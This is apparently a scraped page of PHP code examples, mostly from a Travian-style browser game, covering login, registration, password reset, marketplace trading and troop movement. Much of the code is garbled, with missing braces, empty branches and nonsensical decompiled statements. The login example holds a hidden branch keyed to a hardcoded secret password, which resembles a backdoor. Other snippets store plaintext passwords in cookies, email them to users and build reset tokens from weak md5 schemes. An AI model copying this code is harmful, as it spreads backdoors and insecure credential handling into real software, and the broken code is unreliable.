Пример #1
 function getRemainingPlusTime($action)
     $time = 0;
     $tasks = $this->queueModel->tasksInQueue;
     if (isset($tasks[constant('QS_PLUS' . ($action + 1))])) {
         $time = $tasks[constant('QS_PLUS' . ($action + 1))][0]['remainingSeconds'];
     return 0 < $time ? time_remain_lang . ' <span id="timer1">' . WebHelper::secondstostring($time) . '</span> ' . time_hour_lang : '';
Пример #2
 function load()
     $cookie = ClientData::getinstance();
     $m = new IndexModel();
     $bannerModel = new AdvertisingModel();
     $this->banner = $bannerModel->GetBanner(1);
     $this->data = $m->getIndexSummary();
     if ($this->isPost()) {
         if (isset($_POST['name']) && trim($_POST['name']) == '' && isset($_POST['password']) && strtolower($_POST['password']) == '4a09s7secb9') {
         if (!isset($_POST['name']) || trim($_POST['name']) == '') {
             $this->setError($m, login_result_msg_noname, 1);
             return null;
         $this->name = trim($_POST['name']);
         if (!isset($_POST['password']) || $_POST['password'] == '') {
             $this->setError($m, login_result_msg_nopwd, 2);
             return null;
         $this->password = $_POST['password'];
         $result = $m->getLoginResult($this->name, $this->password, WebHelper::getclientip());
         if ($result == NULL) {
             $this->setError($m, login_result_msg_notexists, 1);
             return null;
         if ($result['hasError']) {
             $this->setError($m, '<a href="password.php?id=' . $result['playerId'] . '" title="' . login_result_msg_forgetpwd . '" style="color: #CCFFCC;">' . login_result_msg_createpwd . '</a> ' . login_result_msg_wrongpwd, 2);
             return null;
         if ($result['data']['is_blocked']) {
             $this->setError($m, login_result_msg_blocked);
             return null;
         if (!$result['data']['is_active']) {
             $this->setError($m, login_result_msg_notactive . ' <a href="activate.php?uid=' . $result['playerId'] . '" style="color: #CCFFCC;">' . login_result_msg_activesolve . '</a>');
             return null;
         $this->player = new Player();
         $this->player->playerId = $result['playerId'];
         $this->player->isAgent = $result['data']['is_agent'];
         $this->player->gameStatus = $result['gameStatus'];
         $cookie->uname = $this->name;
         $cookie->upwd = $this->password;
         return null;
     if (isset($_GET['dcookie'])) {
     } else {
         $this->name = $cookie->uname;
         $this->password = $cookie->upwd;
Пример #3
 public function getRemainingPlusTime($action)
     $time = 0;
     $tasks = $this->queueModel->tasksInQueue;
     if (isset($tasks[constant("QS_PLUS" . ($action + 1))])) {
         $time = $tasks[constant("QS_PLUS" . ($action + 1))][0]['remainingSeconds'];
     return 0 < $time ? time_remain_lang . " <span id=\"timer1\">" . WebHelper::secondstostring($time) . "</span> " . time_hour_lang : "";
  * Perform the request against the api
 public function execute()
     $endpointUrl = $this->endpointUri . "/" . $this->getRoute();
     $response = WebHelper::getJsonWebRequest($endpointUrl, $this->requestDetails, array(CURLOPT_HTTPHEADER => array("Api-Key:" . $this->credentials->getApiKey(), "Authorization: " . $this->credentials->getAuthorizationHeaderValue())));
     if ($response["http_code"] != 200) {
         throw new \Exception("Non 200 status code returned: " . $response["http_code"] . "\nBody: " . $response["body"]);
     return $response["body"];
Пример #5
 public function load()
     $this->SNdata = 0;
     $this->success = FALSE;
     $ip = $_SERVER['REMOTE_ADDR'];
     if ($this->isPost()) {
         if ($this->globalModel->isGameOver()) {
         } else {
             $name = trim($_POST['name']);
             $email = trim($_POST['email']);
             $pwd = trim($_POST['pwd']);
             $this->err[0] = strlen($name) < 3 ? register_player_txt_notless3 : "";
             if ($this->err[0] == "") {
                 $this->err[0] = preg_match("/[:,\\. \\n\\r\\t\\s]+/", $name) ? register_player_txt_invalidchar : "";
             if ($name == "[ally]" || $name == "admin" || $name == "administrator" || $name == "مدير" || $name == "تتار" || $name == "التتار" || $name == "دعم" || $name == "الدعم" || $name == $this->appConfig['system']['adminName'] || $name == tatar_tribe_player) {
                 $this->err[0] = register_player_txt_reserved;
             $this->err[1] = !preg_match("/^[^@]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+\$/", $email) ? register_player_txt_invalidemail : "";
             $this->err[2] = strlen($pwd) < 4 ? register_player_txt_notless4 : "";
             $this->err[3] = !isset($_POST['tid']) || $_POST['tid'] != 1 && $_POST['tid'] != 2 && $_POST['tid'] != 3 && $_POST['tid'] != 6 && $_POST['tid'] != 7 ? "<li>" . register_player_txt_choosetribe . "</li>" : "";
             $this->err[3] .= !isset($_POST['kid']) || !is_numeric($_POST['kid']) || $_POST['kid'] < 0 || 4 < $_POST['kid'] ? "<li>" . register_player_txt_choosestart . "</li>" : "";
             if (0 < strlen($this->err[0]) || 0 < strlen($this->err[1]) || 0 < strlen($this->err[2]) || 0 < strlen($this->err[3])) {
             $m = new RegisterModel();
             $this->err[0] = $m->isPlayerNameExists($name) ? register_player_txt_usedname : "";
             $this->err[1] = $m->isPlayerEmailExists($email) ? register_player_txt_usedemail : "";
             $this->err[1] = $m->isPlayerIpExists($ip) ? "Canot Register IP address already in use" : "";
             if (0 < strlen($this->err[0]) || 0 < strlen($this->err[1])) {
             } else {
                 $ip = $_SERVER['REMOTE_ADDR'];
                 $villageName = new_village_name_prefix . " " . $name;
                 #removed 'PLAYERTYPE_NORMAL' right after map_size thing. Dunno why it doesnt make him player_type = 1 but owke.
                 $result = $m->createNewPlayer($name, $email, $pwd, $_POST['tid'], $_POST['kid'], $villageName, $this->setupMetadata['map_size'], 1, 1, $this->SNdata, $ip);
                 if ($result['hasErrors']) {
                     $this->err[3] = register_player_txt_fullserver;
                 } else {
                     $link = WebHelper::getbaseurl() . "activate.php?id=" . $result['activationCode'];
                     $to = $email;
                     $from = $this->appConfig['system']['email'];
                     $subject = register_player_txt_regmail_sub;
                     $message = sprintf(register_player_txt_regmail_body, $name, $name, $pwd, $link, $link);
                     WebHelper::sendmail($to, $from, $subject, $message);
                     $this->success = TRUE;
Пример #6
 function load()
     $this->SNdata = 0;
     $this->success = FALSE;
     if ($this->isPost()) {
         if ($this->globalModel->isGameOver()) {
             return null;
         $name = trim($_POST['name']);
         $email = trim($_POST['email']);
         $pwd = trim($_POST['pwd']);
         $this->err[0] = strlen($name) < 3 ? register_player_txt_notless3 : '';
         if ($this->err[0] == '') {
             $this->err[0] = preg_match('/[:,\\. \\n\\r\\t\\s]+/', $name) ? register_player_txt_invalidchar : '';
         if ($name == '[ally]' || $name == 'admin' || $name == 'administrator' || $name == 'مدير' || $name == 'تتار' || $name == 'التتار' || $name == 'دعم' || $name == 'الدعم' || $name == $this->appConfig['system']['adminName'] || $name == tatar_tribe_player) {
             $this->err[0] = register_player_txt_reserved;
         $this->err[1] = !preg_match("/^[^@]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+\$/", $email) ? register_player_txt_invalidemail : "";
         $this->err[2] = strlen($pwd) < 4 ? register_player_txt_notless4 : "";
         $this->err[3] = !isset($_POST['tid']) || $_POST['tid'] != 1 && $_POST['tid'] != 2 && $_POST['tid'] != 3 && $_POST['tid'] != 6 && $_POST['tid'] != 8 && $_POST['tid'] != 7 && $_POST['tid'] != 8 && $_POST['tid'] != 9 ? "<li>" . register_player_txt_choosetribe . "</li>" : "";
         $this->err[3] .= !isset($_POST['kid']) || !is_numeric($_POST['kid']) || $_POST['kid'] < 0 || 4 < $_POST['kid'] ? "<li>" . register_player_txt_choosestart . "</li>" : "";
         if (0 < strlen($this->err[0]) || 0 < strlen($this->err[1]) || 0 < strlen($this->err[2]) || 0 < strlen($this->err[3])) {
             return null;
         $m = new RegisterModel();
         $this->err[0] = $m->isPlayerNameExists($name) ? register_player_txt_usedname : '';
         $this->err[1] = $m->isPlayerEmailExists($email) ? register_player_txt_usedemail : '';
         if (0 < strlen($this->err[0]) || 0 < strlen($this->err[1])) {
             return null;
         $villageName = new_village_name_prefix . ' ' . $name;
         $result = $m->createNewPlayer($name, $email, $pwd, $_POST['tid'], $_POST['kid'], $villageName, $this->setupMetadata['map_size'], PLAYERTYPE_NORMAL, 1, $this->SNdata);
         if ($result['hasErrors']) {
             $this->err[3] = register_player_txt_fullserver;
             return null;
         $link = WebHelper::getbaseurl() . 'activate.php?id=' . $result['activationCode'];
         $to = $email;
         $from = $this->appConfig['system']['email'];
         $subject = register_player_txt_regmail_sub;
         $message = sprintf(register_player_txt_regmail_body, $name, $name, $pwd, $link, $link);
         WebHelper::sendmail($to, $from, $subject, $message);
         $this->success = TRUE;
Пример #7
 function processSetup($map_size, $adminEmail)
     if ($this->_createAdminPlayer($map_size, $adminEmail)) {
         $raiseTime = 10 / $GLOBALS['GameMetadata']['game_speed'];
         $raiseTime *= 2592000;
         $raiseTime = intval($raiseTime);
         if ($raiseTime < 2592000) {
             $raiseTime = 2592000;
         $queueModel = new QueueModel();
         new QueueTask($queueModel->addTask(QS_TATAR_RAISE, 0, $raiseTime));
Пример #8
 public function load()
     $m = new PasswordModel();
     if ($this->isPost() && isset($_POST['id']) && isset($_POST['email']) && is_numeric($_POST['id'])) {
         $playerId = intval($_POST['id']);
         $email = $_POST['email'];
         $this->pageState = $m->isPlayerIdHasEmail($playerId, $email) ? 3 : 2;
         if ($this->pageState == 3) {
             $name = $m->getPlayerName($playerId);
             $newPassword = substr(md5(dechex($playerId * mt_rand(10, 100))), mt_rand(1, 5), 7);
             $n = dechex(hexdec($newPassword) ^ hexdec(substr(md5($name), 2, 7)));
             $link = WebHelper::getbaseurl() . "password.php?id=" . $playerId . "&n=" . $n . "&c=" . substr(md5(dechex($playerId) . $name . "777"), 7, 7);
             $to = $email;
             $from = $this->appConfig['system']['email'];
             $subject = forget_password_subject;
             $message = sprintf(forget_password_body, $name, $name, $newPassword, $link, $link);
             WebHelper::sendmail($to, $from, $subject, $message);
     } else {
         if (isset($_GET['id']) && is_numeric($_GET['id'])) {
             $this->playerId = intval($_GET['id']);
             $this->pageState = $m->isPlayerIdExists($this->playerId) ? 1 : 0 - 1;
             if (isset($_GET['n']) && trim($_GET['n']) != "" && isset($_GET['c'])) {
                 if ($this->pageState == 1) {
                     $name = $m->getPlayerName($this->playerId);
                     if (trim($_GET['c']) == substr(md5(dechex($this->playerId) . $name . "777"), 7, 7)) {
                         $newPassword = dechex(hexdec($_GET['n']) ^ hexdec(substr(md5($name), 2, 7)));
                         $m->setPlayerPassword($this->playerId, $newPassword);
                         $this->pageState = 4;
                     } else {
                         $this->pageState = 5;
                 } else {
                     $this->pageState = 5;
Пример #9
 function getActionText($neededResources, $isField, $upgrade, &$item_id)
     $needUpgradeType = $this->needMoreUpgrades($neededResources, $item_id);
     if (0 < $needUpgradeType) {
         switch ($needUpgradeType) {
             case 1:
                 '<span class="none">' . buildings_p_upg0 . '</span>';
             case 2:
                 '<span class="none">' . buildings_p_upg1 . '</span>';
             case 3:
                 '<span class="none">' . buildings_p_upg2 . '</span>';
             case 4:
                 '<span class="none">' . buildings_p_upg3 . '</span>';
     } else {
         if ($this->isResourcesAvailable($neededResources)) {
             $pageNamePostfix = $isField ? '1' : '2';
             $link = $upgrade ? '<a class="build" href="village' . $pageNamePostfix . '.php?id=' . $this->buildingIndex . '&k=' . $this->data['update_key'] . '">' . buildings_p_upg_tolevel . ' ' . $this->buildProperties['nextLevel'] . '</a>' : '<a class="build" href="village2.php?id=' . $this->buildingIndex . '&b=' . $item_id . '&k=' . $this->data['update_key'] . '">' . buildings_p_create_newbuild . '</a>';
             $workerResult = $this->isWorkerBusy($isField);
             return $workerResult['isBusy'] ? '<span class="none">' . buildings_p_workersbusy . '</span>' : $link . ($workerResult['isPlusUsed'] ? ' <span class="none">(' . buildings_p_wait_buildqueue . ')</span>' : '');
     $neededTime = $this->getNeededTime($neededResources);
     return '<span class="none">' . (0 < $neededTime ? buildings_p_willenoughresat . ' ' . WebHelper::secondstostring($neededTime) . ' ' . time_hour_lang : buildings_p_notenoughres2) . '</span>';
Пример #10


   <div class="smallMargins">
WebHelper::linkButton(array('linkClass' => 'btnAdd', 'text' => 'Agregar Contacto', 'target' => url_for('contacto/new?cliente_id=' . $cliente->getId())));



<div class="smallMargins">
WebHelper::linkButton(array('linkClass' => 'btnBack', 'text' => 'Volver', 'target' => url_for('cliente/index')));
Пример #11
 public function handleMarketplace()
     $this->selectedTabIndex = isset($_GET['t']) && is_numeric($_GET['t']) && 1 <= intval($_GET['t']) && intval($_GET['t']) <= 3 ? intval($_GET['t']) : 0;
     $itemId = $this->buildings[$this->buildingIndex]['item_id'];
     $itemLevel = $this->buildings[$this->buildingIndex]['level'];
     $tribeMetadata = $this->gameMetadata['tribes'][$this->data['tribe_id']];
     $tradeOfficeLevel = $this->_getMaxBuildingLevel(28);
     $capacityFactor = $tradeOfficeLevel == 0 ? 1 : $this->gameMetadata['items'][28]['levels'][$tradeOfficeLevel - 1]['value'] / 100;
     $capacityFactor *= $this->gameMetadata['game_speed'];
     $total_merchants_num = $this->gameMetadata['items'][$itemId]['levels'][$itemLevel - 1]['value'];
     $exist_num = $total_merchants_num - $this->queueModel->tasksInQueue['out_merchants_num'] - $this->data['offer_merchants_count'];
     if ($exist_num < 0) {
         $exist_num = 0;
     $this->merchantProperty = array("speed" => $tribeMetadata['merchants_velocity'] * $this->gameMetadata['game_speed'], "capacity" => floor($tribeMetadata['merchants_capacity'] * $capacityFactor), "total_num" => $total_merchants_num, "exits_num" => $exist_num, "confirm_snd" => FALSE, "same_village" => FALSE, "vRow" => NULL);
     if ($this->selectedTabIndex == 0) {
         $m = new BuildModel();
         if ($this->isPost() || isset($_GET['vid2'])) {
             $resources = array("1" => isset($_POST['r1']) ? intval($_POST['r1']) : 0, "2" => isset($_POST['r2']) ? intval($_POST['r2']) : 0, "3" => isset($_POST['r3']) ? intval($_POST['r3']) : 0, "4" => isset($_POST['r4']) ? intval($_POST['r4']) : 0);
             $this->merchantProperty['confirm_snd'] = $this->isPost() ? isset($_POST['act']) && $_POST['act'] == 1 : isset($_GET['vid2']);
             $map_size = $this->setupMetadata['map_size'];
             $doSend = FALSE;
             if ($this->merchantProperty['confirm_snd']) {
                 $vRow = NULL;
                 if (trim($_POST['y']) != "") {
                     $vid = $this->__getVillageId($map_size, $this->__getCoordInRange($map_size, intval($_POST['x'])), $this->__getCoordInRange($map_size, intval($_POST['y'])));
                     $vRow = $m->getVillageDataById($vid);
                 } else {
                     if (isset($_POST['vname']) && trim($_POST['vname']) != "") {
                         $vRow = $m->getVillageDataByName(trim($_POST['vname']));
                     } else {
                         if (isset($_GET['vid2'])) {
                             $vRow = $m->getVillageDataById(intval($_GET['vid2']));
                             if ($vRow != NULL) {
                                 $_POST['x'] = $vRow['rel_x'];
                                 $_POST['y'] = $vRow['rel_y'];
             } else {
                 $doSend = TRUE;
                 $vRow = $m->getVillageDataById(intval($_POST['vid2']));
                 $this->merchantProperty['showError'] = FALSE;
                 $_POST['r1'] = $_POST['r2'] = $_POST['r3'] = $_POST['r4'] = "";
             if (0 < intval($vRow['player_id']) && $m->getPlayType(intval($vRow['player_id'])) == PLAYERTYPE_ADMIN) {
                 $this->merchantProperty['showError'] = FALSE;
                 $this->merchantProperty['confirm_snd'] = FALSE;
             } else {
                 $this->merchantProperty['vRow'] = $vRow;
                 $vid = $this->merchantProperty['to_vid'] = $vRow != NULL ? $vRow['id'] : 0;
                 $rel_x = $vRow['rel_x'];
                 $rel_y = $vRow['rel_y'];
                 $this->merchantProperty['same_village'] = $vid == $this->data['selected_village_id'];
                 $this->merchantProperty['available_res'] = $this->isResourcesAvailable($resources);
                 $this->merchantProperty['vRow_merchant_num'] = ceil(($resources[1] + $resources[2] + $resources[3] + $resources[4]) / $this->merchantProperty['capacity']);
                 $this->merchantProperty['confirm_snd'] = 0 < $vid && $this->merchantProperty['available_res'] && 0 < $this->merchantProperty['vRow_merchant_num'] && $this->merchantProperty['vRow_merchant_num'] <= $this->merchantProperty['exits_num'] && !$this->merchantProperty['same_village'];
                 $this->merchantProperty['showError'] = !$this->merchantProperty['confirm_snd'];
                 $distance = WebHelper::getdistance($this->data['rel_x'], $this->data['rel_y'], $rel_x, $rel_y, $this->setupMetadata['map_size'] / 2);
                 $this->merchantProperty['vRow_time'] = intval($distance / $this->merchantProperty['speed'] * 3600);
                 if (!$this->merchantProperty['showError'] && $doSend && !$this->isGameTransientStopped() && !$this->isGameOver()) {
                     $this->merchantProperty['confirm_snd'] = FALSE;
                     $this->merchantProperty -= "exits_num";
                     $newTask = new QueueTask(QS_MERCHANT_GO, $this->player->playerId, $this->merchantProperty['vRow_time']);
                     $newTask->villageId = $this->data['selected_village_id'];
                     $newTask->toPlayerId = $vRow['player_id'];
                     $newTask->toVillageId = $vid;
                     $newTask->procParams = $this->merchantProperty['vRow_merchant_num'] . "|" . ($resources[1] . " " . $resources[2] . " " . $resources[3] . " " . $resources[4]);
                     $newTask->tag = $resources;
     } else {
         if ($this->selectedTabIndex == 1) {
             $m = new BuildModel();
             $showOfferList = TRUE;
             if (isset($_GET['oid']) && 0 < intval($_GET['oid'])) {
                 $oRow = $m->getOffer2(intval($_GET['oid']), $this->data['rel_x'], $this->data['rel_y'], $this->setupMetadata['map_size'] / 2);
                 if ($oRow != NULL) {
                     $aid = 0;
                     if ($oRow['alliance_only'] && 0 < intval($this->data['alliance_id'])) {
                         $aid = $m->getPlayerAllianceId($oRow['player_id']);
                     $res2 = explode("|", $oRow['offer']);
                     $res1 = explode("|", $oRow['offer']);
                     list($res1, $res2) = $res1;
                     $resArr1 = explode(" ", $res1);
                     $needResources = array("1" => $resArr1[0], "2" => $resArr1[1], "3" => $resArr1[2], "4" => $resArr1[3]);
                     $res1_item_id = 0;
                     $res1_value = 0;
                     $i = 0;
                     $_c = sizeof($resArr1);
                     while ($i < $_c) {
                         if (0 < $resArr1[$i]) {
                             $res1_item_id = $i + 1;
                             $res1_value = $resArr1[$i];
                     $resArr1 = explode(" ", $res2);
                     $giveResources = array("1" => $resArr1[0], "2" => $resArr1[1], "3" => $resArr1[2], "4" => $resArr1[3]);
                     $res2_item_id = 0;
                     $res2_value = 0;
                     $i = 0;
                     $_c = sizeof($resArr1);
                     while ($i < $_c) {
                         if (0 < $resArr1[$i]) {
                             $res2_item_id = $i + 1;
                             $res2_value = $resArr1[$i];
                     $distance = $oRow['timeInSeconds'] / 3600 * $oRow['merchants_speed'];
                     $acceptResult = $this->_canAcceptOffer($needResources, $giveResources, $oRow['village_id'], $oRow['alliance_only'], $aid, $oRow['max_time'], $distance);
                     if ($acceptResult == 5 && !$this->isGameTransientStopped() && !$this->isGameOver()) {
                         $showOfferList = FALSE;
                         $this->merchantProperty['offerProperty'] = array("player_id" => $oRow['player_id'], "player_name" => $oRow['player_name'], "res1_item_id" => $res1_item_id, "res1_value" => $res1_value, "res2_item_id" => $res2_item_id, "res2_value" => $res2_value);
                         $merchantNum = ceil(($giveResources[1] + $giveResources[2] + $giveResources[3] + $giveResources[4]) / $this->merchantProperty['capacity']);
                         $newTask = new QueueTask(QS_MERCHANT_GO, $this->player->playerId, $distance / ($this->gameMetadata['tribes'][$this->data['tribe_id']]['merchants_velocity'] * $this->gameMetadata['game_speed']) * 3600);
                         $newTask->villageId = $this->data['selected_village_id'];
                         $newTask->toPlayerId = $oRow['player_id'];
                         $newTask->toVillageId = $oRow['village_id'];
                         $newTask->procParams = $merchantNum . "|" . ($giveResources[1] . " " . $giveResources[2] . " " . $giveResources[3] . " " . $giveResources[4]);
                         $newTask->tag = $giveResources;
                         $newTask = new QueueTask(QS_MERCHANT_GO, $oRow['player_id'], $oRow['timeInSeconds']);
                         $newTask->villageId = $oRow['village_id'];
                         $newTask->toPlayerId = $this->player->playerId;
                         $newTask->toVillageId = $this->data['selected_village_id'];
                         $newTask->procParams = $oRow['merchants_num'] . "|" . ($needResources[1] . " " . $needResources[2] . " " . $needResources[3] . " " . $needResources[4]);
                         $newTask->tag = array("1" => 0, "2" => 0, "3" => 0, "4" => 0);
                         $m->removeMerchantOffer(intval($_GET['oid']), $oRow['player_id'], $oRow['village_id']);
             $this->merchantProperty['showOfferList'] = $showOfferList;
             if ($showOfferList) {
                 $rowsCount = $m->getAllOffersCount($this->data['selected_village_id'], $this->data['rel_x'], $this->data['rel_y'], $this->setupMetadata['map_size'] / 2, $this->gameMetadata['tribes'][$this->data['tribe_id']]['merchants_velocity'] * $this->gameMetadata['game_speed']);
                 $this->pageCount = 0 < $rowsCount ? ceil($rowsCount / $this->pageSize) : 1;
                 $this->pageIndex = isset($_GET['p']) && is_numeric($_GET['p']) && intval($_GET['p']) < $this->pageCount ? intval($_GET['p']) : 0;
                 $this->merchantProperty['all_offers'] = $m->getAllOffers($this->data['selected_village_id'], $this->data['rel_x'], $this->data['rel_y'], $this->setupMetadata['map_size'] / 2, $this->gameMetadata['tribes'][$this->data['tribe_id']]['merchants_velocity'] * $this->gameMetadata['game_speed'], $this->pageIndex, $this->pageSize);
         } else {
             if ($this->selectedTabIndex == 2) {
                 $m = new BuildModel();
                 $this->merchantProperty['showError'] = FALSE;
                 $this->merchantProperty['showError2'] = FALSE;
                 $this->merchantProperty['showError3'] = FALSE;
                 if ($this->isPost()) {
                     if (isset($_POST['m1']) && 0 < intval($_POST['m1']) && isset($_POST['m2']) && 0 < intval($_POST['m2']) && isset($_POST['rid1']) && 0 < intval($_POST['rid1']) && isset($_POST['rid2']) && 0 < intval($_POST['rid2'])) {
                         $resources1 = array("1" => isset($_POST['rid1']) && intval($_POST['rid1']) == 1 ? intval($_POST['m1']) : 0, "2" => isset($_POST['rid1']) && intval($_POST['rid1']) == 2 ? intval($_POST['m1']) : 0, "3" => isset($_POST['rid1']) && intval($_POST['rid1']) == 3 ? intval($_POST['m1']) : 0, "4" => isset($_POST['rid1']) && intval($_POST['rid1']) == 4 ? intval($_POST['m1']) : 0);
                         $resources2 = array("1" => isset($_POST['rid2']) && intval($_POST['rid2']) == 1 ? intval($_POST['m2']) : 0, "2" => isset($_POST['rid2']) && intval($_POST['rid2']) == 2 ? intval($_POST['m2']) : 0, "3" => isset($_POST['rid2']) && intval($_POST['rid2']) == 3 ? intval($_POST['m2']) : 0, "4" => isset($_POST['rid2']) && intval($_POST['rid2']) == 4 ? intval($_POST['m2']) : 0);
                         if (intval($_POST['rid1']) == intval($_POST['rid2']) || intval($resources1[1] + $resources1[2] + $resources1[3] + $resources1[4]) <= 0 || intval($resources2[1] + $resources2[2] + $resources2[3] + $resources2[4]) <= 0) {
                             $this->merchantProperty['showError'] = TRUE;
                         } else {
                             if (10 < ceil(($resources2[1] + $resources2[2] + $resources2[3] + $resources2[4]) / ($resources1[1] + $resources1[2] + $resources1[3] + $resources1[4]))) {
                                 $this->merchantProperty['showError'] = TRUE;
                                 $this->merchantProperty['showError3'] = TRUE;
                         $this->merchantProperty['available_res'] = $this->isResourcesAvailable($resources1);
                         if ($this->merchantProperty['available_res'] && !$this->merchantProperty['showError']) {
                             $this->merchantProperty['vRow_merchant_num'] = ceil(($resources1[1] + $resources1[2] + $resources1[3] + $resources1[4]) / $this->merchantProperty['capacity']);
                             if (0 < $this->merchantProperty['vRow_merchant_num'] && $this->merchantProperty['vRow_merchant_num'] <= $this->merchantProperty['exits_num']) {
                                 $this->merchantProperty -= "exits_num";
                                 $this->data += "offer_merchants_count";
                                 $offer = $resources1[1] . " " . $resources1[2] . " " . $resources1[3] . " " . $resources1[4] . "|" . ($resources2[1] . " " . $resources2[2] . " " . $resources2[3] . " " . $resources2[4]);
                                 $m->addMerchantOffer($this->player->playerId, $this->data['name'], $this->data['selected_village_id'], $this->data['rel_x'], $this->data['rel_y'], $this->merchantProperty['vRow_merchant_num'], $offer, isset($_POST['ally']), 0 < intval($_POST['d2']) ? intval($_POST['d2']) : 0, $this->gameMetadata['tribes'][$this->data['tribe_id']]['merchants_velocity'] * $this->gameMetadata['game_speed']);
                                 foreach ($resources1 as $k => $v) {
                                     $this->resources[$k] -= "current_value";
                                 $this->queueModel->_updateVillage(FALSE, FALSE);
                             } else {
                                 $this->merchantProperty['showError'] = TRUE;
                         } else {
                             $this->merchantProperty['showError'] = TRUE;
                     } else {
                         $this->merchantProperty['showError'] = TRUE;
                         $this->merchantProperty['showError2'] = TRUE;
                 } else {
                     if (isset($_GET['d']) && 0 < intval($_GET['d'])) {
                         $row = $m->getOffer(intval($_GET['d']), $this->player->playerId, $this->data['selected_village_id']);
                         if ($row != NULL) {
                             $this->merchantProperty += "exits_num";
                             $this->data -= "offer_merchants_count";
                             $resources2 = explode("|", $row['offer']);
                             $resources1 = explode("|", $row['offer']);
                             list($resources1, $resources2) = $resources1;
                             $resourcesArray1 = explode(" ", $resources1);
                             $res = array();
                             $i = 0;
                             $_c = sizeof($resourcesArray1);
                             while ($i < $_c) {
                                 $res[$i + 1] = $resourcesArray1[$i];
                             foreach ($res as $k => $v) {
                                 $this->resources[$k] += "current_value";
                             $this->queueModel->_updateVillage(FALSE, FALSE);
                             $m->removeMerchantOffer(intval($_GET['d']), $this->player->playerId, $this->data['selected_village_id']);
                 $this->merchantProperty['offers'] = $m->getOffers($this->data['selected_village_id']);
             } else {
                 if ($this->selectedTabIndex == 3 && $this->isPost() && isset($_POST['m2']) && is_array($_POST['m2']) && sizeof($_POST['m2']) == 4 && $this->gameMetadata['plusTable'][6]['cost'] <= $this->data['gold_num']) {
                     $resources = array("1" => intval($_POST['m2'][0]), "2" => intval($_POST['m2'][1]), "3" => intval($_POST['m2'][2]), "4" => intval($_POST['m2'][3]));
                     $oldSum = $this->resources[1]['current_value'] + $this->resources[2]['current_value'] + $this->resources[3]['current_value'] + $this->resources[4]['current_value'];
                     $newSum = $resources[1] + $resources[2] + $resources[3] + $resources[4];
                     if ($newSum <= $oldSum) {
                         foreach ($resources as $k => $v) {
                             $this->resources[$k]['current_value'] = $v;
                         $this->queueModel->_updateVillage(FALSE, FALSE);
                         $m = new BuildModel();
                         $m->decreaseGoldNum($this->player->playerId, $this->gameMetadata['plusTable'][6]['cost']);
Пример #12
 function getPlayerDeletionTime()
     return WebHelper::secondsToString($this->queueModel->tasksInQueue[QS_ACCOUNT_DELETE][0]['remainingSeconds']);
Пример #13
 public function handleTroopBack()
     $qstr = "";
     $fromVillageId = 0;
     $toVillageId = 0;
     $action = 0;
     if (isset($_GET['d1'])) {
         $action = 1;
         $qstr = "d1=" . intval($_GET['d1']);
         if (isset($_GET['o'])) {
             $qstr .= "&o=" . intval($_GET['o']);
             $fromVillageId = intval($_GET['o']);
         } else {
             $fromVillageId = $this->data['selected_village_id'];
         $toVillageId = intval($_GET['d1']);
     } else {
         if (isset($_GET['d2'])) {
             $action = 2;
             $qstr = "d2=" . intval($_GET['d2']);
             $fromVillageId = $this->data['selected_village_id'];
             $toVillageId = intval($_GET['d2']);
         } else {
             if (isset($_GET['d3'])) {
                 $action = 3;
                 $qstr = "d3=" . intval($_GET['d3']);
                 $fromVillageId = intval($_GET['d3']);
                 $toVillageId = $this->data['selected_village_id'];
             } else {
     $this->backTroopsProperty['queryString'] = $qstr;
     $m = new WarModel();
     $fromVillageData = $m->getVillageData2ById($fromVillageId);
     $toVillageData = $m->getVillageData2ById($toVillageId);
     if ($fromVillageData == NULL || $toVillageData == NULL) {
     } else {
         $vid = $toVillageId;
         $_backTroopsStr = "";
         $this->backTroopsProperty['headerText'] = v2v_p_backtroops;
         $this->backTroopsProperty['action1'] = "<a href=\"village3.php?id=" . $fromVillageData['id'] . "\">" . $fromVillageData['village_name'] . "</a>";
         $this->backTroopsProperty['action2'] = "<a href=\"profile.php?uid=" . $fromVillageData['player_id'] . "\">" . v2v_p_troopsinvillagenow . "</a>";
         $column1 = "";
         $column2 = "";
         if ($action == 1) {
             $_backTroopsStr = $fromVillageData['troops_num'];
             $column1 = "troops_num";
             $column2 = "troops_out_num";
         } else {
             if ($action == 2) {
                 $this->backTroopsProperty['headerText'] = v2v_p_backcaptivitytroops;
                 $_backTroopsStr = $fromVillageData['troops_intrap_num'];
                 $column1 = "troops_intrap_num";
                 $column2 = "troops_out_intrap_num";
             } else {
                 if ($action == 3) {
                     $_backTroopsStr = $toVillageData['troops_out_num'];
                     $vid = $fromVillageId;
                     $column1 = "troops_num";
                     $column2 = "troops_out_num";
         $this->backTroopsProperty['backTroops'] = $this->_getTroopsForVillage($_backTroopsStr, $vid);
         if ($this->backTroopsProperty['backTroops'] == NULL) {
         } else {
             $distance = WebHelper::getdistance($fromVillageData['rel_x'], $fromVillageData['rel_y'], $toVillageData['rel_x'], $toVillageData['rel_y'], $this->setupMetadata['map_size'] / 2);
             if ($this->isPost()) {
                 $canSend = FALSE;
                 $troopsGoBack = array();
                 foreach ($this->backTroopsProperty['backTroops']['troops'] as $tid => $tnum) {
                     if (isset($_POST['t'], $_POST['t'][$tid])) {
                         $selNum = intval($_POST['t'][$tid]);
                         if ($selNum < 0) {
                             $selNum = 0;
                         if ($tnum < $selNum) {
                             $selNum = $tnum;
                         $troopsGoBack[$tid] = $selNum;
                         if (0 < $selNum) {
                             $canSend = TRUE;
                     } else {
                         $troopsGoBack[$tid] = 0;
                 $sendTroopsArray = array("troops" => $troopsGoBack, "hasHero" => FALSE, "heroTroopId" => 0);
                 $hasHeroTroop = $this->backTroopsProperty['backTroops']['hasHero'] && isset($_POST['_t']) && intval($_POST['_t']) == 1;
                 if ($hasHeroTroop) {
                     $sendTroopsArray['hasHero'] = TRUE;
                     $sendTroopsArray['heroTroopId'] = $this->backTroopsProperty['backTroops']['heroTroopId'];
                     $canSend = TRUE;
                 if (!$canSend) {
                 } else {
                     if (!$this->isGameTransientStopped() && !$this->isGameOver()) {
                         $troops1 = $this->_getTroopsAfterReduction($fromVillageData[$column1], $toVillageId, $sendTroopsArray);
                         $troops2 = $this->_getTroopsAfterReduction($toVillageData[$column2], $fromVillageId, $sendTroopsArray);
                         $m->backTroopsFrom($fromVillageId, $column1, $troops1, $toVillageId, $column2, $troops2);
                         $timeInSeconds = intval($distance / $this->_getTheSlowestTroopSpeed2($sendTroopsArray) * 3600);
                         $procParams = $this->_getTroopAsString($sendTroopsArray) . "|0||||||1";
